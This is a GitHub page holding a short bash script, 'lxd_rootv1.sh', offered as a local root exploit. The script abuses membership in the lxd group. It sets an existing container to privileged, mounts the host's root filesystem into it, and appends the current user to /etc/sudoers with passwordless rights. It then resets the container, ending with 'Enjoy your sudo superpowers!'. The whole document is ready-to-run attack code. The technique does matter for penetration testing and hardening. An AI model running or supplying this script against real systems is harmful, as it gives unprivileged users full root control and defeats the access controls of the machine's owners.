-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathlxd_rootv1.sh
executable file
·47 lines (32 loc) · 1.23 KB
/
lxd_rootv1.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/bin/bash
# Local root exploit by initstring (github.com/initstring/lxd_root)
# This takes advantage of any member of ability for any member of the local
# `lxd` group to mount the host root filesystem into a container, hijacking
# the privileges of root.
#
# We can then use the high-privilege mount to modify the /etc/sudoers file.
USAGE="$(basename "$0") <container name>
The exploit currently requires an existing container."
if [ $# -eq 0 ]
then
echo "$USAGE"
exit 0
fi
echo "[+] Stopping container $1"
lxc stop "$1"
echo "[+] Setting container security privilege on"
lxc config set "$1" security.privileged true
echo "[+] Starting container $1"
lxc start "$1"
echo "[+] Mounting host root filesystem to $1"
lxc config device add "$1" rootdisk disk source=/ path=/mnt/root recursive=true
echo "[+] Using container to add $USER to /etc/sudoers"
lxc exec "$1" -- /bin/sh -c "echo $USER 'ALL=(ALL)' NOPASSWD: ALL >> /mnt/root/etc/sudoers"
echo "[+] Unmounting host root filesystem from $1"
lxc config device remove "$1" rootdisk
echo "[+] Resetting container security privilege to off"
lxc config set "$1" security.privileged false
echo "[+] Stopping the container"
lxc stop "$1"
echo "[+] Done! Enjoy your sudo superpowers!"
exit 0